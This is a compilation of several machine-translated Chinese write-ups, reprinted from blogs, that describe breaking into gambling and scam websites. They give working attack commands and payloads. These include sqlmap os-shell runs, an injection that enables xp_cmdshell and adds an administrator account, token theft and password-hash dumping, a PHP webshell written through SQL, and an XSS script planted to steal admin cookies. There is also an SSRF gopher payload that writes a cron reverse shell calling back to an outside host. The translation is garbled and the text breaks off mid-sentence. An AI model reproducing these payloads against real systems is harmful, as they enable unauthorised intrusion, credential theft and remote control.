UKhackteam

0x00 Preface Our small team infiltrated the bc site that was discovered by chance. From the beginning, only the sqlmap rebounded without echoes, to the CS online, to the process of cooperating with MSF to the process of upgrading the rights of dirty potatoes, to the process of obtaining SYSTEM permissions, share and record the penetration process 0x01 Login box sql injection I saw that there is nothing to say about the login box, try SQLmap shuttle first Burp packet capture login request, save it to the file and run it directly to try python3 sqlmap.py -r '2.txt' has blind and stack injection See if you can use SQLmap to get shell python3 sqlmap.py -r '2.txt' --os-shell visually unsuccessful The prompt is that xp_cmdshell is not enabled. Since there was stack injection after scanning out before, try to use the stored procedure to open xp_cmdshell. Payload: userName=admin';exec sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure'xp_cmdshell', 1;RECONFIGURE;WAITFOR DELAY '0:0:15' --password=123 Delay 15 seconds, execution is successful (if there is no stack injection, each statement is split and executed one sentence at a time, the effect should theoretically be the same) By the way, try to use xp_cmdshell to add user rights and construct payload (note that the password should not be set too simple. The Windows system seems to have requirements for password strength, but if the password is set too simple, it may fail) userName=admin';exec xp_cmdshell 'net user cmdshell Test ZjZ0ErUwPcxRsgG8E3hL /add';exec master.xp_cmdshell 'net localgroup administrators Test /add';WAITFOR DELAY '0:0:15' --password=123nmap Scan, the target 3389 is open, mstsc.exe is directly connected Not connected Run os-shell again and find that you can run the absolute path, which is a good sign Successfully popped up shell Because it is a blind note, I did not echo the commands such as whoami, so I directly used a shellcode for CS The generated shellcode is pasted directly into the os-shell and then returned to the car Then the CS went online, and it was soon. Hurry up and call a few young people who are not moral and moral to go online to play cards 0x02 Information Collection tasklist, check the process, it is a bit difficult to do with Alibaba Cloud Shield systeminfo see what's there Alibaba Cloud's server, version of Windows Server 2008 R2 has 75 patches Whoami, it is estimated that the database has been reduced in power, and the service permissions are very low Try to upload an exp from ms-16-032, and the upload failed directly At this point, the role of CS is extremely limited. CS is just a pleasure, and it depends on MSF. 0x03 Use frp to CS server to link MSF attacks Open a listener on CS Modify the configuration file of frp After saving the configuration file, start frp in the frp folder ./frpc -c frpc.ini Turn on msf to enable monitoring use exploit/multi/handlerset payload windows/meterpreter/reverse_httpset LHOST 127.0.0.1set LPORT 9996run Here you can see that MSF has been turned on to monitor Go back to CS, right-click to select a host and add a session Choose the listener you just created, choose Back to msf, the session bounced back, very quickly Let's go to the shell and take a look. In fact, it took over the beacon of CS, and it still has low permissions 0x04 Upload Rotten Potato EXP to EXP Prepare a EXP with rotten potatoes locally (note that you add more slashes on the windows path, although you can not add them, but after trying a few machines, I found that the success rate of adding is high, I don’t know what the principle is) upload /root/EXP/JuicyPotato/potato.exe C:\\Users\\Public CS flipped through the file of the target machine and found that it was successfully uploaded Then enter the folder of the target machine to start preparing for the escalation of rights cd C:\\Users\\Publicuse incognitoexecute -cH -f ./potato.exelist_tokens -u Copy administrator's token impersonate_token 'administrator' Finally, check whether the escalation is successful 0x05 mimikatz crawl password hash First raise the right getsystem Try to dump it directly No, I have to use mimikatz load mimikatz and crawl password hash mimikatz_command -f samdump:hashes You can also use the modules that come with MSF (this is a little slower than mimikatz) run post/windows/gather/smart_hashdump Then throw it to CMD5 to decrypt it. If it is a weak password, you can uninstall the account password. This time, you are lucky. It is a weak password. You can uninstall the password directly. Then mstsc.exe is connected directly and successfully launched on the desktop. 0x06 Information collection expands attack range After successfully obtaining the target's highest permission, try to obtain other similar sites through information collection to carry out batch attacks. @crow Master extracted the CMS feature of the website and wrote a fofa script to scan in batches, and finally got 1900+ sites. However, since BC stations often shoot and change places, most of these domain names are often unavailable, so the survival status of the domain name needs to be confirmed again. Using the script, the last step is to obtain more than 100 surviving domain names. When using scripts to access vulnerable URLs in batches, use the generated request to batch initiate requests to run this request using multi-threaded scripts python3 sqlmap.py -r '{0}' --dbms='Microsoft SQL Server' --batch --os-shell finally gets a host that can pop up os-shell, and then manually inject shellcode, and finally gets a large number of online hosts 0x07 Go to the backstage to visit Use the administrator account password found in the database to log in to the website background to take a look 20 people recharged more than 800,000 There are also people’s game accounts called “Bright Future”, but they don’t know that online gambling is destroying their own future! I advise everyone to stay away from gambling, and I hope that the gamblers who are trapped in will turn back! Reprinted in the original link address: https://mp.weixin.qq.com/s?__biz=MzI3NjA4MjMyMw==mid=2647772541idx=1sn=646e732c96521e0d4d9d109426c4dc4dchksm=f35f9681c4281f97b4c46cd95f858dc90481706a6db607fcfd6596a15745ca10c88ba83e0e9fscene=21#wechat_redirect

0X00 Cause of the incident I encountered a pre-storage phone bill of 3999 and was tricked to send a tablet. Alipay was operated and cashed out and transferred money and took away my Huabei. When I got home, I felt something was wrong and regretted it more and more. I searched online about this kind of activities and caught a lot of them and they were exactly the same. The more I looked at it, the more angry I became. The most important thing is that the tablet I gave was more than 800 yuan, which was not worth the pre-sale phone bill, and it was actually stuck, so I decided to dig deeper. 0X01 Information Collection Copy the short domain name link sent by verification text message to the browser to resolve the URL xx.xxxx.xx.xx. The good guy is obviously not under the official mobile official. He searched the URL through the webmaster tool to analyze it and resolved it to Alibaba Cloud without cdn enabled. The domain name holder is a technology company in Guangdong. The domain name expired in November this year. After searching the company, I found that the four big words "operation abnormalities" were abnormal. My phone bill for several thousand must be very cool. By scanning the obtained domain name with nmap -p 1-65355 xx.xxxx.xx for full ports, check which services are open, and then starting from its services, you can see that there are only ports 80 and 22. The only useful information is that port 22 knows that the other party is from the Linux server. After accessing the web service to port 80, this interface is also the interface that jumps from the short domain name in the text message content. Its URL form is /admin/user/login's obvious user login interface. As we all know, admin means management. Intuition makes me reduce directory access layer by layer, and it turns out to the merchant management interface of admin/login. 0X02 Vulnerability mining Currently, two login interfaces have been found. Backstage login has no verification code to perform blasting operations, but the prerequisite is to know the merchant’s mobile number. Let’s log in to my own users normally to see if there are any available places. The functions are very simple and there is no available places. The avatar cannot be edited and uploaded. This interface only provides the total amount of phone bills displayed. I guess they only use such a platform to display a number to scare consumers in the past few months. I decided to exit the user to use burp to capture a packet and analyze the transmitted data, enter the correct mobile number verification code and SMS verification code to enable the packet capture, but I can see that the parameters are all transmitted in plain text, and the verification codes are all correct. If I replace it with other users, can I reach a level of overprivileges? The replacement number at mobile successfully logged in to other users and obtained a level of overprivileges. The same personal center and the same place without any use, and switch to the background login box. If you don’t say anything, you can directly use burp to catch a login POST package. Save it to the local txt file and run it with SQLmap. You may have unexpected gains. Because it is Alibaba Cloud’s server that is 100% intercepted locally, I chose to use the same Alibaba Cloud server as it to run. Username, password, and remenbaer are not injected. It's okay, grab a package and send a package to see the data that responds. You can see that the content of the account is directly output to the value tag. Construct xss payload to close and plug it! ”scriptalert(/xss/)/script then re-sends the reflective xss. 0X03 Getshell The two loopholes dug were too useless, and the idea was temporarily cut off. Go back and analyze the data packets caught. I haven't paid much attention to the response packets. I found that the words rememberMe=deleteMe are the words shiro deserialization vulnerability. Just go to exp, check the source code here and fill in the static files in the website for detection. You can see that the command execution box is input-able proof that the vulnerability exists, and the other way around, it cannot be entered. In addition, a 5663.js verification file is generated in the directory of /css level, and the access test is successful in writing the file. The file is successfully written, and then the shell is written to the Ice Scorpion connection and execute whoami to view the current permissions. The Linux environment directly roots the highest permissions to save the trouble of raising the permissions. The permissions are available, and the server opens 22 ports to the public key to log in directly without password. However, considering that the other party is Alibaba Cloud's server logging in remote location, there will be a text message reminder that the noise is too loud, so the solution was not implemented. We continued to dig out useful information. After searching for a long time, we found a database configuration file. The address of the database connection is 172.xx.xx.xx (the masters are very skilled and the intranet address is also given to the code to prevent the analges). You can tell at a glance that it is the IP station database of the intranet. I find a way to forward it on the proxy and connect it. There is a Socks agent on the Ice Scorpion to cooperate with Proxifier to add Navicat Premium data program management to tunnel agent into its intranet database. After the Proxifier is configured, the program will be added to connect. However, after repeated trials and repeated connections, the data will be abnormal directly, and most of them will be intercepted. I have stepped on a lot of tricks in the intranet proxy. In short, I am still not experienced enough. There are also masters who have given instructions to use adminer.php (manually @Uncia boss here). Adminer is really good, lightweight and convenient. Just upload the web directory. But the environment is that the Java environment only supports jsp scripts and adminer only has php scripts. 0X04 Intranet Agent Since adminer does not support ice scorpions and cannot be proxied, then we will set up a proxy tunnel and step into a lot of pitfalls here to try to use reDuh and Tunna, either without traffic or disconnection at once. I don’t know if my posture is wrong or is restricted by the current environment. Finally, I found the reGeorg artifact on GitHub. reGeorg It can be said to be an upgraded version of reDuh, which mainly uses the port of the intranet server to pass http/https The tunnel forwards to the local machine and forms a loop for the target server to connect to the internal open port of the target server on the intranet or with port policies. It uses webshell to create a The socks agent performs intranet penetration, because the current environment is Java, we upload the .jsp forwarding file to the website directory. After uploading the script, accessing its script, it shows that Georg says, 'All seems fine', the proxy is successful. Then execute python2 reGeorgSocksProxy.py -p 9999 -u http://xx.xxxx.xx/tunnel.jsp also displays Georg says, 'All seems fine' on the command line interface. Open Proxifier to basically configure the 9999 port of local 127.0.0.1, then set the proxy rules to add the Navicat program. Select the Direct off state for other actions, but only allow Navicat traffic to pass through. After the configuration is complete, right-click Navicat to open in Proxifier local proxy mode. You can see that the link is stable and the Python window has traffic transmission (remember, please do not close the window during the proxy process). 0X05 True scam We have also connected the database, look at the account in the membership table, and find your name by filtering the name field in the membership table. Sure enough, the time when the data was lying there coincides with the time when the data was being tricked. How to prove it? It’s very simple. The first batch of Curry’s users were from May 2019, and it’s a year away. Is this a scam logged in to an account with a 19-year account and it’s clear that I can see the cashback record. I randomly select a lucky player to log in to his account based on the previous level of overriding the authority loophole. It’s been a year since this has passed, and it’s only the first time that it’s cash back. In the past few months, it’s the consumers who fool you with various reasons. In short, it’s the consumers who will always suffer. 0X06 Write to the end As for why I wrote this article, because I am also a victim, I want to analyze it in this way so that everyone can understand this bureau more intuitively so that more people can be tricked. When you go to handle it, they will tell you that this is an activity authorized by mobile (I told me before). But this way, you can see that it has nothing to do with mobile for half a cent. It is just a platform they built independently, and the balance inside is just a fool. There is a platform that shows you a number to reassure you. As for the hundreds of dollars that arrive in the first month, they are just manually recharged hundreds of dollars from your set of thousands. Let’s not talk about it. In the next year, I will have to eat dirt and return Huabei. I probably will have more tricks when the merchant logs into the system, but until the penetration test points, my purpose is to prove whether this is a scam. Since it is a solid one, we don’t need to go deeper. The safe confrontation we do is just like a war without gunpowder. In addition to winning or losing, the outcome of the war also has the difference between justice and injustice. The only difference is that we must always stand from the perspective of justice and explore its loophole principle without causing harm to it. Reprinted in the original link address: https://mp.weixin.qq.com/s?__biz=Mzg2NDYwMDA1NA==mid=2247486245idx=1sn=ebfcf540266643c0d618e5cd47396474chksm=ce67a1bcf91028aa09435781e951926067dcf41532dacf9f6d3b522ca2df1be8a3c8551c1672scene=21#wechat_redirect

0x00 Information Collect A friend gave me a website, which is considered a relatively large BC. I looked at the main website and there was no entrance, so I changed to one of his promotion platforms. Then first scan the directory roughly, hoping to see some useful things. At this time, I can recommend an interface for you to quickly and roughly see its important files https://scan.top15.cn/web/infoleak, for example, whether the source code of the website is packaged. It is obvious that I did not scan it out and then show you the scanning results. config.inc.php, according to experience, should be a configuration file of the database, but the size is 0B. I will tentatively access it. As expected, there is no upload access to it, which is 403. However, based on experience, I will still scan it again. Maybe it is a fck editor. Unfortunately, I didn’t scan anything. /index.php/login/, the size is only 2kb, it is not a background at all, and it is a bit disappointing. There is only one web asset for the port, so I can only take a look at its website functions. Then I clicked on the query and hoped to find the injection here. 0x01 Backend Injection Sure enough, there is injection, and the rest is to look for the backend. View the current database, and (extractvalue(1,concat(0x7e,(select database()),0x7e)))- Here I will remember to step on the pit, account=1') and (extractvalue(1,concat(0x7e,(select database()),0x7e)))--('This is the complete payload. At the beginning, my payload was account=1') and (extractvalue(1,concat(0x7e,(select database()),0x7e)))--+. tm never produces data, I thought there was a fucking filter. And fuzzing one by one. After thinking about whether the comment will be closed and the comment will be added'). Sure enough, the data will be released after closing. Then I used SQLmap to run data, but I didn't expect that the tm could not run out. Only by reconstructing the sqlmap statement by yourself python2 sqlmap.py -r 1.txt --prefix '')' --suffix '--('' --level 3 --tamper=space2plus --skip-urlencode finally ran out. I looked at the payload later. Every time I ran, the spaces would be compiled to 20%. After the url is encoded, the payload will not take effect, so I used the skip-urlencode parameter. 0x02 Injection Point The surprise came again. I looked at the priv and it was true that so many mysql injections finally had a relatively high permission. I didn't even read the account and password directly. I just reported an error except for the absolute path. Isn't this --os-shell? When I checked the payload, I found hws, and I felt it was not easy, brothers. Sure enough, if you can't write it in, you can't write it in the end if you add it --hex. That's fine, and --sql-shell. Writing in stacking, although I know that it is likely that I can't write it in, I still have to try it out, maybe. Penetration of tm is metaphysics. I checked the priv, it was not null, and gave me a little hope. Write it, write a txt first to see. select 1 into outfile 'D:/wwwroot/wnshd.com_22fqiz/web/1.txt' Then I went to the website to read it and didn't write it in, it was really difficult. All Is left is --file-write, this one is not sticking to the map, and it still has not been taken down. Helpless, I can only check the backend account password. After collecting the account and password, I went to the backend, but unfortunately, I still couldn’t find it, and it was almost despair. This tm has been delivered to you, but why can't I still get it? I feel that it is a problem with SQLmap. I have done the above steps again. I understand that SQLmap may lie to you, but hws doesn't. If you can't write it in, it just can't. Forget it, let’s change the idea. Isn’t it that the directory is exploded? wolsoowpppps, I'm going back and checking it out, nothing unexpected happens 403, wolsoowpppps/admin, wolsoowpppps/login. There is nothing, dirsearch scanned, tm still has nothing. 0x03 Unsuccessful writing of horse Is it not the path of web/wolsoowpppps? Could it be that I have absolutely problems with the path? I visit It's also 403, which only means that this is a directory that has not been scanned out. Damn it, I feel like there is something here. As a result, I scanned the picture and stopped posting it, and there was still nothing. Ha ha ha ha. It's a waste of joy. But I always feel that there is something wrong with this wolsoowppps directory. I fuzzed it, fuzzing it out of the web, and then scanning the web. Oh my goodness, I temp. php visit, a Malaysian. Isn’t this a good thing to get so? Then blast, and finally, successfully blast in, upload the ant key, and take it down. This Malaysia looks very familiar. But hws is still really powerful. The command cannot be executed, and the plug-in and the .so method have not been found. Thank you Brother Huang here. The guard god he mentioned is mainly asp, just send an ice scorpion horse. Then I thought of a lot of solutions, but I can't get this permission down. I believe the boss of xz should know, let me tell you the situation. Currently, there is only the viewing and modification permissions for disk d, and exe cannot be executed, which means that the Ms series cannot be used. The potato clan cannot pass it on. iis cannot be dropped in seconds. Killing Ruan is a turquoise, a guardian, and a safe dog. The upward cs is, but the execution of the dll and Mshta is stuck. I don’t know how to increase the power for the time being. I want to continue to expand, but I have little contact with the power for the promotion. I hope the prophet will give my cousin the idea. 0x04 Take the backend Finally, I thought about how the Malaysians were uploaded. The other party may also start with the injection - I found xss in one place (I also found it, but since the customer service was offline in October, I have changed the site, so my xss has not been able to fight) - Found the background - Since it is a tp3.2.3 site, the backend rce (tp3.2.3 cache getshell) - went to Malaysia. This is the location of xss This is the backend Although this site has a rough price comparison, its ideas are very simple, so I should learn more. Reprinted from the original link: https://mp.weixin.qq.com/s/qNdLNaPNK_485uAPILQXRQhttps://xz.aliyun.com/t/8491

You can find that the jsp and php suffix coexist when registering the main site. It should be that different routes have reversed different middleware, so no vulnerabilities are found. The forum is Discuz! X3.2 Discuz emergency room was found. admin.php 403, uc_server and emergency room have no weak passwords. In 《渗透某盗版游戏网站》, I introduced what vulnerabilities are in the Discuz background, so what about the vulnerabilities in the front desk? Mainly there are arbitrary file deletion, SSRF, and uc_server blasting. First, delete any file. POST /home.php?mod=spacecpac=profileop=base birthprovince=./././info.php Then POST file to delete info.php format='https://x.com/home.php?mod=spacecpac=profileop=base'method='POST' enctype='multipart/form-data' input type='file'name='birthprovince' id='file'/input type='text'name='formhash' value='017b5107'/input type='text'name='profilesubmit' value='1'/input type='submit' value='Submit' //Although this vulnerability is not low, it is useless for subsequent penetration. It is difficult for Discuz to install by deleting files. Let's look at SSRF again. /forum.php?mod=ajaxaction=downremoteimgmessage=[img=1,1]http://qzf9jq.dnslog.cn/1.png[/img]formhash=017b5107 This is an SSRF that does not echo, and can only be judged by time delay. 1. You can directly detect the intranet through http. If the IP survives, it will have a short delay (regardless of whether the port is open or not), and if the IP does not exist, it will have a long delay. 2. The protocol can be changed through 302 jump, and ftp, dict, and gopher can be supported. Third, the port can be detected through the ftp protocol. If the port is open, it will have a long delay and if the port is closed, it will have a short delay. First access my VPS through the http protocol to get the real IP of the forum. 163.*. *.35.bc.googleusercontent.com(35.*.*.163) Then try to blindly call the local redis (here to detect the local ports, it is unreasonable, so I directly blindly call it) When the gopher protocol attacks redis locally, it is found that it does not need to declare the length of each line of command string with $. First, see the clear SSRF attack payload /forum.php?mod=ajaxaction=downremoteimgmessage=[img=1,1]http://62.1.1.1/302.php?s=gopherip=127.0.0.1port=6379data=_flushall%0d%0aconfigset dir /var/spool/cron/%0d%0aconfig set dbfilename root%0d%0aset 0'\n\n*/1 * * * * * bash -i /dev/tcp/62.1.1.1/566701\n\n'%0d%0asave%0d%0aquit%0d%0axx=1.png[/img]formhash=017b5107 Then, between 302.php? and data=, you need to encode the url, and all strings from data=to xx=1.png are encoded twice, and then packaged in bp. /forum.php?mod=ajaxaction=downremoteimgmessage=[img=1,1]http://62.1.1.1/302.php?s=gopher%26ip=127.0.0.1%26port=6379%26data=%25%35%66%25%36%36%63%25%37%35%25%37%33%25%36%38%25%36%31%25%36%63%25%36%63%25%32%35%25%33%33%25%36%33%25%36%33%25%36%33%25%36%63%25%32%35%25%33% 30%25%36%34%25%32%35%25%33%30%25%36%31%25%36%33%25%36%66%25%36%65%25%36%36%25%36%25%36%39%25%36%37%25%32%30%25%36%25%36%31%25%37%32%30%25%36%32%25%32%30%25%36%32%66%25%37%36%31%25%37%32%25%32%32%66 %25%37%33%25%37%30%25%36%66%25%36%66%25%36%66%25%36%63%25%32%66%25%36%33%25%36%33%25%36%65%25%32%66%25%36%65%25%32%35%25%36%34%25%32%35%25%33%30%25%36%31%25%36%33%25%36%66%25%36%25%36%25%36%25%36%39%25%36%37%25%32%30%2 5%37%33%25%36%35%25%37%34%25%32%30%25%36%34%25%36%32%25%36%36%25%36%39%25%36%63%25%36%35%25%36%65%25%36%31%25%36%64%25%36%35%25%32%30%25%37%32%25%36%66%25%36%66%25%37%34%25%32%35%25%33%30%25%36%34%25%32%35%25%33%30%25% 36%31%25%37%33%25%36%35%25%37%34%25%32%30%25%33%30%25%32%30%25%32%32%25%35%63%25%36%65%25%35%63%25%36%65%25%32%61%25%32%61%25%32%30%25%32%61%25%32%30%25%32%61%25%32%61%25%32%30%25%32%61%25%32%61%25%32%30%25%32%61%25%32%30%25%32%61%25%32%30%25%32%61%25%32%30%25%32%61%25%32%30%25%32%30%25%32%30%25%36 %32%25%36%31%25%37%33%25%36%38%25%32%30%25%32%66%37%36%25%32%66%25%34%25%36%36%34%25%36%35%25%36%32%66%25%33%31%25%32%66%25%33%31%25%32%66%25%32%65%31%32%65%31%32%6 5%25%33%31%25%32%65%25%33%31%25%32%66%25%33%35%25%33%36%25%33%36%25%33%37%25%32%30%25%33%30%25%33%65%25%32%36%25%33%30%25%33%65%25%32%36%25%33%30%25%33%30%25%36%34%25%32%35%25%33%30%25%33%30%25%33%30%25%36%31% 25%37%33%25%36%31%25%37%36%25%36%35%25%32%35%25%33%30%25%36%34%25%32%35%25%33%30%25%36%31%25%37%31%25%37%35%25%36%39%25%37%34%25%32%35%25%33%30%25%36%31%25%32%36xx=1.png[/img]formhash=017b5107 But it was found that the payload was intercepted by the XSS and SQL injection protection provided by Discuz. Therefore, payload can only be written in VPS. ?php $ip=$_GET['ip']; $port=$_GET['port']; $scheme=$_GET['s']; $data='_flushall%0d%0aconfigset dir /var/spool/cron/%0d%0aconfig set dbfilename root%0d%0aset 0'\n\n*/1 * * * * bash -i /dev/tcp/62.1.1.1 /566701\n\n'%0d%0asave%0d%0aquit%0d%0aquit%0d%0a'; header('Location:$scheme://$ip:$port/$data'); Test whether the redis on VPS can be successful/forum.php?mod=ajaxaction=downremoteimgmessage=[img=1,1]http://62.1.1.1/302.php?s=gopher%26ip=62.1.1.1%26port=6379%26data=1.png[/img]formhash=017b5107 no problem. However, the utilization failed in the actual environment, the reason is uncertain, it is possible to have no redis, lack of redis permissions or have a password. I started writing scripts to detect the intranet, but I didn’t have much hope. It is Google Cloud, and it does not necessarily have an intranet. The ip dictionary of all intranet ips is created f=open('ip.txt','w') f.write('127.0.0.1') f.write('localhost') for i in range(1,256): ip='192.168.'+str(i)+'.1' f.write(ip) for i in range(16,32): for ii inrange(1,256): ip='172.'+str(i)+'.'+str(ii)+'.1' f.write(ip) for i in range(1,256): for ii inrange(1,256): ip='10.'+str(i)+'.'+str(ii)+'.1' f.write(ip) f.close() Then, use time delay to find the intranet IP segment. Here, since the delay of IP blockage is more than 7s, you must use multiple threads to complete it. Since it is OK to detect whether there is any protocol for IP, I simply use gopher to attack Redis's payload directly, what if I hit it directly. import requestsimport threadingdef ssrf(i): url='https://x.com/forum.php?mod=ajaxaction=downremoteimgmessage=[img=1,1]http://62.1.1.1/302.php?s=gopher%26ip='+i+'%26port=6379%26data=1.png[/img]formhash=017b5107' header={'User-Agent':'Mozilla/5.0(Windows NT 6.1; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0', 'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2', 'Accept-Encoding': 'gzip,deflate', 'Connection': 'keep-alive' } cookie={'PNuE_2132_saltkey':'vx3wOD3T','PNuE_2132_auth':'8b46%2F9AD2x2XyfyESVQaytdhS%2FVWrzIGQLWCe3IAr6AIwuX8raGrp%2BgRkMv39ylNO2GAIfHep01AGhxApI0OCyXirNKx'} r=requests.get(url,cookies=cookie,headers=header,allow_redirects=False) if r.elapsed.total_seconds() 6: timeout=str(i)+'port:'+str(r.elapsed.total_seconds()) print(timeout) else: timeout=str(i)+'port:'+str(r.elapsed.total_seconds()) fo=open('openip.txt','a') fo.write(str(i)+'open\n') fo.close() print(str(i)+'open') print(timeout)def thread(list): name=[] for i in list: th=threading.Thread(target=ssrf,args=(i,))) name.append(th) th.start() for th inname: th.join()folist=open('ip.txt','r')list=[]flag=0for i infolist.readlines(): i=i.replace('\n','') if flag 21: list.append(i) flag=flag+1 else: thread(list) flag=0 list=[]Only an open gateway is found 172.30.2.1, then run the intranet IP on this gateway and replace ip.txt. As a result, after running a day, I only ran out two intranet IPs, 172.30.2.1 and 172.30.2.2. The probability is that 172.30.2.2 is itself, and 172.30.2.1 is the virtual gateway of the cloud server. Finally, use the ftp protocol to run their ports and just change the script yourself. Most of them are false alarms, and in fact they only open two ports 80 and 443, so unless other intranet IPs are found later, SSRF is not to be expected. The last uc_server blast is to change the XFF header to cause the graphic verification code to be fixed, and the use fails. For details, see https://www.freebuf.com/articles/web/197546.html The forum has come to an end, let’s see what’s wrong with the customer service system. /res/image.html?id=upload/6c825ed7ea4cd25657288ab4f7d0227f The id parameter is passed, and the directory cannot be crossed. File upload cannot be used, so start directory scanning. The admin login interface has slider verification, but it is a scam from the front end and is useless in the back end, so it is fruitless to try to explode. When you see /actuator, you know it is spring boot and use targeted dictionary to blast. /swagger-ui.html is empty, /env jumps admin, /heapdump 403. But I tried it out of no way /heapdump.json Unzip out the 1G memory file, open it using MemoryAnalyzer, and query OQL. Since there is no cooperation with /env, I can only blindly check the configuration information. Here are some tips I have figured out. select* from org.springframework.web.context.support.StandardServletEnvironment check configuration, pay attention to sorting in Retained Heap (size), which is more convenient. select* from java.lang.String s WHERE toString(s) LIKE '.*password.*'Check strings containing password. This search method is not easy to find the associated class, but you can quickly find login records and so on. If you replace password with http://, you can find some urls. select* from java.util.Hashtable$Entry x WHERE(toString(x.key).contains('username'))select* from java.util.Hashtable$Entry x WHERE (toString(x.key).contains('password'))select* from java.util.Hashtable$Entry x WHERE (toString(x.key).contains('url'))Select* from java.util.Hashtable$Entry x WHERE (toString(x.key).contains('url')) Quickly check the database related information and found the mysql address account password. However, unfortunately, Amazon's database has an IP whitelist by default and cannot log in remotely. select* from java.lang.String s WHERE toString(s) LIKE '.*SESSION.*' Found the session being logged in, and log in to the background after replacement. The background uses the WSSS protocol for real-time conversations, and there are no utilization points in the avatar and customer service reply. Only some wailings of poisonous dogs were found. The black box test was fruitless. I searched for the featured class names in heapdump, and then searched on github. I found a copy of the source code that might be the initial version, and the target was a revision, but the source code was not very complete. Audit the incomplete code and find an arbitrary file read and an SSRF. With some source code, you know the configuration file location and read the configuration file Get the database configuration, of course before

0X00 The origin of the matter After understanding the story, after my experience, this should be a pig killing case Scammers use some means to convince victims that they can make money and induce recharges and kill pigs to gambling 0X01 Penosis process-It was taken down in about twenty minutes The penetration process is simple and boring: After taking a look at the IP and port, I judged that there should be no cloud waf, so I started scanning the directory directly After a few minutes, I scanned a http://xxxx.com.cn/u.php. It turned out to be the integrated environment of upupw, as shown in the figure below Idea, blast phpmyadmin, or find the default database password of upupw, try it first Successfully logged in with the password provided by the system, the default is: DRsXT5ZJ6Oi55LPQ successfully logged in phpmyadmin Then try getshell. Since there is an upupw probe, I directly viewed phpinfo, and the absolute path to the website. I directly tried to write shells in regular terms because of the upupw probe. You need to know the absolute path, database root permissions, and database write permissions. Specific statements: SELECT '?php eval(@$_POST['xx']);' INTO OUTFILE 'D:\\wap\\member_bak.php' Note: Under Windows, double backslashes are required, otherwise they will be escaped and then use kitchen knife/ant sword and other links. Since there was no screenshot at the time, the website is now unable to be opened, so the following will directly release the status after getting the shell. The penetration ended. I looked at the permissions. It was the system permissions. However, our goal was to locate the IP information and location information of the fraudsters, and then the next step is 0X02 The IP and ports of positioning fraudsters It is much easier to get the shell. Just find the php file logged in to the background and insert the xss code. After searching for a while, I found that the background login is under another website directory, edited admin778899.php echo'sCRiPtsRC=https://xx.xx/XFXX/sCrIpT'; Waiting for fraudsters to log in I'm actually logged in with my mobile phone, 666 Replace cookies to log in to the background, but found that it was useless, it was just some numbers. Go to ipip.net to check the IP address information. No accident, I was indeed abroad again. Alas. 0X03 Inform fans to the results During the process, I directly posted the WeChat chat record with the victim. 0X04 How to prevent such fraud 1. When making friends online, you should improve your awareness of fraud prevention, maintain a good social mentality, and pay attention to the protection of personal privacy information, especially when it comes to financial transactions. Be sure to verify the other party’s true identity through multiple channels; 2. Anyone who involves taking you to invest and manage your finances on the Internet and has high returns is considered a fraud; 3. Scammers constantly share information about investment profitability in their circle of friends to attract victims to take the initiative to consult; 4. Induce victims to register the platform and invest funds. When the victim saw the profit and wanted to withdraw cash, the platform continued to lure money and commit fraud on the grounds of the victim's bank card number, such as incorrectly requesting deposits, failure to notify as required, account freeze, taxes, etc. 5. Maintain a correct view of investment and financial management, and do not blindly believe in risk-free but high-return investment methods, so there will be no pie falling from the sky. Reprinted from the original link: https://mp.weixin.qq.com/s/7o4XV8MKbX3wCT3ZxbCMng

I made a lot of qp (chess and cards), and BC penetrated. I spent 2 nights all night and drank a few plates. I briefly talked about the process and summarized it. Let me first talk about qp. Taking my penetration success case as an example, first of all, information collection is essential. What are the characteristics of qp? His background will be set up in different ports behind the server domain name, as shown in the figure: You can find the basics about the port. Point of entry: Find the location of SQL injection or feedback in the app, XSS There is a situation where the packet capture shows 127.0.0.1 and the packet cannot be caught. This situation is more than that of the large plate, and it does not necessarily follow the TCP UDP protocol. You can refer to the Proxifier global proxy mentioned by T-ice After you have the background, you can fuzz it. Some administrators will have the habit of backup and may make new discoveries. Relatively speaking, qp is quite simple. Let’s talk about BC and see the case of penetration last night. Basically, large BC plates are equipped with various protection + cdn standard. After all, others don’t care about this little device money after making so much money. I registered an account and found that there was no place to call XSS. Stop Because this kind of large-scale service is generally quite good, the cards are very generous in every aspect, such as navigation and points mall. There should be a messy one. On a VIP query page of its main site, it is a sql injection, and it is a thinkphp framework. Thinkphp3.2.3, because there is a CDN that doesn't know the real IP, the background is a very troublesome thing. I originally wanted to see if there is any discovery in the log in the database. Nothing for use in birds. Try reading the log file, no. Finally, reading the configuration file confirmed something very stupid. Maybe after all night, people's mind is a little stiff. I forgot that this kind of BC background must be separated. Hi. Stay up late less. then. I have manually added some possible parameters to the main domain name based on my previous experience. admin.XXXX.com agdw.

I. Preface Recently I heard that the website built with a certain qipai product has SQL injection, and someone just sent one. Infiltration of customary routines, a shuttle information collection - vulnerability detection/utilization - privilege raising/authorization maintenance - clean traces 2. Information collection The browser accesses the home page preliminary discovery system: Windows server middleware IIS7.5 Language: ASPX Port scan nmap -sV -T4 -p- 11x.xx.xx.xx.xx has many open ports. Among them, there are several web services: 80 (current homepage), 81, 82, 88, 4700181: It is the backend of this qipai site. 82: It is also a backend. I don’t know what system it is. There is a verification code 88/47001: Access failed 1433: Database mssql Also opened 139 and 445 but it was filtered. I don’t know if there is a firewall, so I will look at it later. Use Dirsearch to scan sensitive directories first. The website language collected earlier is aspx, plus -e specified language python dirsearch.py -u http://11x.xx.xxx.xx -e aspx Use 7kbscan again. After all, the dictionary collected here is commonly used by Chinese people /m/is the user registration page, which may be useful, remember first /test.html is the entrance to adjust the WeChat, it is useless. It may be to guide the victims to chat on the mobile phone. Check the IP server of a certain operator in Beijing. It is quite bold to build a website in domestic servers. Information sorting It is probably a small site built by myself. I won’t expand and collect new things, so as not to waste time. III. Vulnerability detection Focus on the 81 port found earlier, which is the website’s backend management page No verification code, just write admin/admin for username/password, grab the package The username has a quote and sent a request directly to return an error. If nothing unexpected happens, there should be an error injection or a blind note. Separate two groups to save this data packet to local qipai.txt, use sqlmap to scan, it is already known that it is an mssql database, plus the --dbms parameter to specify the database type to save time python sqlmap.py -r qipai.txt --dbms 'Microsoft SQL Server' --dbs Another way, send the packet to the intruder module to explode the password. I tried to enter the username casually in the browser, and the prompt 'User name does not exist'. When entering admin, the prompt 'User name or password is wrong', indicating that the admin account exists, just burst the password. The password is 888999, a weak password, eternal god! Log in to the background successfully There are only 69 registered 